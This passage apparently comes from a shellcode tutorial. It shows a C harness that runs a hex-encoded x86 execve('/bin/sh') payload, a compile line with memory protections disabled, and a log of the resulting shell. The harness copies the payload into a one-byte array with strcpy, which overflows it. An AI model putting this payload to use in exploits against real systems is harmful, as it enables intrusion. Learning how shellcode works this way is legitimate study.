...
| Code Block | ||||
|---|---|---|---|---|
| ||||
#include<stdio.h>
#include<string.h>
unsigned char shellcode [] = "\xeb\x16\x5b\x31\xc0\x88\x43\x07\x89\x5b\x08\x89\x43\x0c\x8d\x4b\x08\x8d\x53\x0c\xb0\x0b\xcd\x80\xe8\xe5\xff\xff\xff/bin/sh";
unsigned char code[] = "";
void main(){
int len = strlen(shellcode);
printf("Shellcode len : %d\n",len);
strcpy(code,shellcode);
(*(void(*)()) code)();
} |
...
| Code Block | ||
|---|---|---|
| ||
lazenca0x0@ubuntu:~/Shell$ gcc -o testshell2 -fno-stack-protector -z execstack --no-pie -m32 testshell2.c lazenca0x0@ubuntu:~/Shell$ ./testshell2 Shellcode len : 36 $ id uid=1000(lazenca0x0) gid=1000(lazenca0x0) groups=1000(lazenca0x0),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare) $ |
...